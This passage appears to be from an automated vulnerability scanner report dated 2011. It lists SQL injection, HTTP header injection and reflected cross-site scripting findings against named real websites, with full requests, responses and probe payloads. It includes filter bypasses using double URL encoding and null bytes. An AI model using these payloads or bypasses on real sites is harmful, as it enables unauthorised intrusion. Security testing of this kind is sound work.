Summary

Severity:   High
Confidence:   Firm
Host:   http://www.nutter.com
Path:   /careers.php

Issue detail

The CategoryID parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the CategoryID parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /careers.php?CategoryID=23' HTTP/1.1
Host: www.nutter.com
Proxy-Connection: keep-alive
Referer: http://www.nutter.com/careers.php
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 01:29:22 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) PHP/4.4.9 with Suhosin-Patch
X-Powered-By: PHP/4.4.9
Content-Type: text/html
Content-Length: 1168

<!-- careers start -->

error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1 | 1064<BR>sql: SELEC
...[SNIP]...

1.7. http://www.regonline.com/Register/Checkin.aspx [ASP.NET_SessionId cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.regonline.com
Path:   /Register/Checkin.aspx

Issue detail

The ASP.NET_SessionId cookie appears to be vulnerable to SQL injection attacks. The payloads 14542449'%20or%201%3d1--%20 and 14542449'%20or%201%3d2--%20 were each submitted in the ASP.NET_SessionId cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

POST /Register/Checkin.aspx?EventID=903860 HTTP/1.1
Host: www.regonline.com
Proxy-Connection: keep-alive
Referer: http://www.regonline.com/Register/Checkin.aspx?EventID=903860
Cache-Control: max-age=0
Origin: http://www.regonline.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijxz0lanc0imgk55mhf2eu4514542449'%20or%201%3d1--%20; %5FrolStats%5FID=DD22D651-4279-4259-A501-EA38CE56381F
Content-Length: 197

__VIEWSTATE=%2FwEPDwULLTE4NzA0MTExMDJkZEX%2FEKbnROnJxseblFE7jHDDFNbZ&ctl00%24cph%24ctlEmailMemID%24txtEmail=%27%40%27.com&radRegType=419299&ctl00%24cph%24txtDiscountCode=&ctl00%24cph%24btnContinue=

Response 1

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Vary: Accept-Encoding
Cache-Control: no-cache, no-store
Content-Type: text/html; charset=utf-8
Date: Tue, 19 Apr 2011 19:36:27 GMT
Expires: -1
Pragma: no-cache
Set-Cookie: ASP.NET_SessionId=ylqsom55dwxvaxewcebgk5iy; path=/; HttpOnly
Content-Length: 24814

<!DOCTYPE html>
<html lang="en-US">
<head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="content-language" content="en" /><title>
   SOURCE Boston 2011 - RegOn
...[SNIP]...
<a href="http://www.regonline.com/__articles/products/online~registration~forms" target="_blank" class="&#xA;                    rol_sharedlinkText&#xA;                ">Registration Form</a>
                       |
                   <a href="http://www.regonline.com/__articles/products/event~planning~software" target="_blank" class="&#xA;                    rol_sharedlinkText&#xA;                ">Event Planning Software</a>
                       |
                   <a href="http://www.regonline.com/__articles/products/online~registration~forms" target="_blank" class="&#xA;                    rol_sharedlinkText&#xA;                ">Registration Forms</a></div>
</div>
</div>


<!--[if lte IE 8]>
</td>
</tr>
</table>
<![endif]-->


<div id="outsideFooter"></div>

</div>

<script type="text/javascript" src="https://www.activestatic.net/ScriptCombiner.axd?s=Integrations&amp;v=-1467147683"></script>

<script type="text/javascript" src="https://www.activestatic.net/ScriptCombiner.axd?s=Register&amp;v=-838054830"></script>
<script type='text/javascript'>var gImagesDomain = 'https://www.activestatic.net/images'; var gAjaxErrorMsg = 'Your last action was unsuccessful. Try again, or click your browser\'s <strong>Refresh</strong> button.';gDecimalSeparator='.';gGroupSeparator=',';</script>
<script type="text/javascript">
var gEmailClientID = 'ctl00_cph_ctlEmailMemID_txtEmail';
var gVerifyEmailClientID = 'ctl00_cph_ctlEmailMemID_txtVerifyEmail';
var gMembershipIDClientID = 'ctl00_cph_ctlEmailMemID_txtMemID';
var gAlreadyRegClientID = 'ctl00_cph_ctlEmailMemID_lnkAlreadyRegistered';
var gValidationDependencies = {};
gValidationDependencies[gEmailClientID] = gMembershipIDClientID;
gValidationDependencies[gMembershipIDClientID] = gEmailClientID;


</script>


<script type="text/javascript">
       var discountCodeLiId = '#ctl00_cph_liDiscountC
...[SNIP]...

Request 2

POST /Register/Checkin.aspx?EventID=903860 HTTP/1.1
Host: www.regonline.com
Proxy-Connection: keep-alive
Referer: http://www.regonline.com/Register/Checkin.aspx?EventID=903860
Cache-Control: max-age=0
Origin: http://www.regonline.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijxz0lanc0imgk55mhf2eu4514542449'%20or%201%3d2--%20; %5FrolStats%5FID=DD22D651-4279-4259-A501-EA38CE56381F
Content-Length: 197

__VIEWSTATE=%2FwEPDwULLTE4NzA0MTExMDJkZEX%2FEKbnROnJxseblFE7jHDDFNbZ&ctl00%24cph%24ctlEmailMemID%24txtEmail=%27%40%27.com&radRegType=419299&ctl00%24cph%24txtDiscountCode=&ctl00%24cph%24btnContinue=

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Vary: Accept-Encoding
Cache-Control: no-cache, no-store
Content-Type: text/html; charset=utf-8
Date: Tue, 19 Apr 2011 19:36:27 GMT
Expires: -1
Pragma: no-cache
Set-Cookie: ASP.NET_SessionId=rkn4yuum3fm5n3b5w0ceui45; path=/; HttpOnly
Content-Length: 24790

<!DOCTYPE html>
<html lang="en-US">
<head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="content-language" content="en" /><title>
   SOURCE Boston 2011 - RegOn
...[SNIP]...
<a href="http://www.regonline.com/__articles/products/event~planning~software" target="_blank" class="&#xA;                    rol_sharedlinkText&#xA;                ">Event Planning Software</a>
                       |
                   <a href="http://www.activegovernment.com/marketing-services/municipal-marketing.htm" target="_blank" class="&#xA;                    rol_sharedlinkText&#xA;                ">Municipal Marketing</a>
                       |
                   <a href="http://www.activeendurance.com/running.htm" target="_blank" class="&#xA;                    rol_sharedlinkText&#xA;                ">Running Software</a></div>
</div>
</div>


<!--[if lte IE 8]>
</td>
</tr>
</table>
<![endif]-->


<div id="outsideFooter"></div>

</div>

<script type="text/javascript" src="https://www.activestatic.net/ScriptCombiner.axd?s=Integrations&amp;v=-1467147683"></script>

<script type="text/javascript" src="https://www.activestatic.net/ScriptCombiner.axd?s=Register&amp;v=-838054830"></script>
<script type='text/javascript'>var gImagesDomain = 'https://www.activestatic.net/images'; var gAjaxErrorMsg = 'Your last action was unsuccessful. Try again, or click your browser\'s <strong>Refresh</strong> button.';gDecimalSeparator='.';gGroupSeparator=',';</script>
<script type="text/javascript">
var gEmailClientID = 'ctl00_cph_ctlEmailMemID_txtEmail';
var gVerifyEmailClientID = 'ctl00_cph_ctlEmailMemID_txtVerifyEmail';
var gMembershipIDClientID = 'ctl00_cph_ctlEmailMemID_txtMemID';
var gAlreadyRegClientID = 'ctl00_cph_ctlEmailMemID_lnkAlreadyRegistered';
var gValidationDependencies = {};
gValidationDependencies[gEmailClientID] = gMembershipIDClientID;
gValidationDependencies[gMembershipIDClientID] = gEmailClientID;


</script>


<script type="text/javascript">
       var discountCodeLiId = '#ctl00_cph_liDiscountCode';
       var regTypeDDLI
...[SNIP]...

1.8. https://www.regonline.com/Register/WebResource.axd [CurrentROLSession cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   https://www.regonline.com
Path:   /Register/WebResource.axd

Issue detail

The CurrentROLSession cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the CurrentROLSession cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Request 1

GET /Register/WebResource.axd HTTP/1.1
Host: www.regonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CurrentROLSession=%2527; ASP.NET_SessionId=ijxz0lanc0imgk55mhf2eu45; %5FrolStats%5FID=DD22D651-4279-4259-A501-EA38CE56381F;

Response 1 (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Cache-Control: private
Content-Type: text/html; charset=utf-8
Date: Tue, 19 Apr 2011 19:40:19 GMT
Connection: close
X-Powered-By: ASP.NET
Content-Length: 19098


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>

</title>


...[SNIP]...
<img src="/__images/global/ErrorImage.jpg" alt="404 Error" />
...[SNIP]...

Request 2

GET /Register/WebResource.axd HTTP/1.1
Host: www.regonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CurrentROLSession=%2527%2527; ASP.NET_SessionId=ijxz0lanc0imgk55mhf2eu45; %5FrolStats%5FID=DD22D651-4279-4259-A501-EA38CE56381F;

Response 2

HTTP/1.1 302 Found
Server: Microsoft-IIS/7.0
Vary: Accept-Encoding
Cache-Control: private
Content-Type: text/html; charset=utf-8
Date: Tue, 19 Apr 2011 19:40:19 GMT
Location: https://regonline.activeeurope.com/__404.aspx
Connection: close
Content-Length: 162

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://regonline.activeeurope.com/__404.aspx">here</a>.</h2>
</body></html>

2. HTTP header injection  previous  next
There are 3 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.



2.1. http://www.regonline.com/marketing/event/features/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.regonline.com
Path:   /marketing/event/features/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload da698%00%0d%0a3fd008c10bf was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

The application attempts to block header injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the newline characters.

Request

GET /marketing/event/features/?da698%00%0d%0a3fd008c10bf=1 HTTP/1.1
Host: www.regonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CurrentROLSession=; ASP.NET_SessionId=ijxz0lanc0imgk55mhf2eu45; %5FrolStats%5FID=DD22D651-4279-4259-A501-EA38CE56381F;

Response

HTTP/1.1 301 moved permanently
Content-Type: text/html
Date: Tue, 19 Apr 2011 19:40:40 GMT
Location: http://www.regonline.com/__features/?da698
3fd008c10bf
=1:
Connection: close
Content-Length: 0


2.2. http://www.regonline.com/marketing/event/pricing/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.regonline.com
Path:   /marketing/event/pricing/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload a2d40%00%0d%0ab15c88885b1 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

The application attempts to block header injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the newline characters.

Request

GET /marketing/event/pricing/?a2d40%00%0d%0ab15c88885b1=1 HTTP/1.1
Host: www.regonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CurrentROLSession=; ASP.NET_SessionId=ijxz0lanc0imgk55mhf2eu45; %5FrolStats%5FID=DD22D651-4279-4259-A501-EA38CE56381F;

Response

HTTP/1.1 301 moved permanently
Content-Type: text/html
Date: Tue, 19 Apr 2011 19:40:35 GMT
Location: http://www.regonline.com/__pricing/?a2d40
b15c88885b1
=1:
Connection: close
Content-Length: 0


2.3. http://www.regonline.com/marketing/event/testimonials/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.regonline.com
Path:   /marketing/event/testimonials/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 8fca8%0d%0acb9e5a58209 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /marketing/event/testimonials/?8fca8%0d%0acb9e5a58209=1 HTTP/1.1
Host: www.regonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CurrentROLSession=; ASP.NET_SessionId=ijxz0lanc0imgk55mhf2eu45; %5FrolStats%5FID=DD22D651-4279-4259-A501-EA38CE56381F;

Response

HTTP/1.1 301 moved permanently
Content-Type: text/html
Date: Tue, 19 Apr 2011 19:40:35 GMT
Location: http://www.regonline.com/__resources/?8fca8
cb9e5a58209
=1:
Connection: close
Content-Length: 0


3. Cross-site scripting (reflected)  previous
There are 195 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.



3.1. http://b.scorecardresearch.com/beacon.js [c1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload 77cef<script>alert(1)</script>e7b87124b3c was submitted in the c1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=777cef<script>alert(1)</script>e7b87124b3c&c2=7400849&c3=1&c4=&c5=&c6= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://blog.viglink.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Tue, 26 Apr 2011 18:43:05 GMT
Date: Tue, 19 Apr 2011 18:43:05 GMT
Connection: close
Content-Length: 1235

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
E.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"777cef<script>alert(1)</script>e7b87124b3c", c2:"7400849", c3:"1", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



3.2. http://b.scorecardresearch.com/beacon.js [c15 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c15 request parameter is copied into the HTML document as plain text between tags. The payload f29b7<script>alert(1)</script>6928a4854ea was submitted in the c15 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=2&c2=6036034&c3=&c4=/clips15540%2522%253E%253Cscript%253Ealert%28document.cookie%29%253C/script%253Ef37e55f8e40/360434/god-bless-you-captain-hindsight&c5=20000&c6=&c15=f29b7<script>alert(1)</script>6928a4854ea HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.southparkstudios.com/clips15540%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ef37e55f8e40/360434/god-bless-you-captain-hindsight
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Tue, 26 Apr 2011 20:01:57 GMT
Date: Tue, 19 Apr 2011 20:01:57 GMT
Connection: close
Content-Length: 3707

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...


COMSCORE.beacon({c1:"2", c2:"6036034", c3:"", c4:"/clips15540%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ef37e55f8e40/360434/god-bless-you-captain-hindsight", c5:"20000", c6:"", c10:"", c15:"f29b7<script>alert(1)</script>6928a4854ea", c16:"", r:""});



3.3. http://b.scorecardresearch.com/beacon.js [c2 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload b1411<script>alert(1)</script>c556e7c19dc was submitted in the c2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=7400849b1411<script>alert(1)</script>c556e7c19dc&c3=1&c4=&c5=&c6= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://blog.viglink.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Tue, 26 Apr 2011 18:43:06 GMT
Date: Tue, 19 Apr 2011 18:43:06 GMT
Connection: close
Content-Length: 1235

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
on(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"7", c2:"7400849b1411<script>alert(1)</script>c556e7c19dc", c3:"1", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



3.4. http://b.scorecardresearch.com/beacon.js [c3 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload d261f<script>alert(1)</script>90e70e35545 was submitted in the c3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=7400849&c3=1d261f<script>alert(1)</script>90e70e35545&c4=&c5=&c6= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://blog.viglink.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Tue, 26 Apr 2011 18:43:06 GMT
Date: Tue, 19 Apr 2011 18:43:06 GMT
Connection: close
Content-Length: 1235

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
y{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"7", c2:"7400849", c3:"1d261f<script>alert(1)</script>90e70e35545", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



3.5. http://b.scorecardresearch.com/beacon.js [c4 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload 78b30<script>alert(1)</script>5454f96e47f was submitted in the c4 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=7400849&c3=1&c4=78b30<script>alert(1)</script>5454f96e47f&c5=&c6= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://blog.viglink.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Tue, 26 Apr 2011 18:43:06 GMT
Date: Tue, 19 Apr 2011 18:43:06 GMT
Connection: close
Content-Length: 1235

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"7", c2:"7400849", c3:"1", c4:"78b30<script>alert(1)</script>5454f96e47f", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



3.6. http://b.scorecardresearch.com/beacon.js [c5 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload 65838<script>alert(1)</script>7988e0f5ce8 was submitted in the c5 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=7400849&c3=1&c4=&c5=65838<script>alert(1)</script>7988e0f5ce8&c6= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://blog.viglink.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Tue, 26 Apr 2011 18:43:06 GMT
Date: Tue, 19 Apr 2011 18:43:06 GMT
Connection: close
Content-Length: 1235

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"7", c2:"7400849", c3:"1", c4:"", c5:"65838<script>alert(1)</script>7988e0f5ce8", c6:"", c10:"", c15:"", c16:"", r:""});



3.7. http://b.scorecardresearch.com/beacon.js [c6 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload 4118b<script>alert(1)</script>4ac7260861d was submitted in the c6 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=7400849&c3=1&c4=&c5=&c6=4118b<script>alert(1)</script>4ac7260861d HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://blog.viglink.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Tue, 26 Apr 2011 18:43:07 GMT
Date: Tue, 19 Apr 2011 18:43:07 GMT
Connection: close
Content-Length: 1235

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


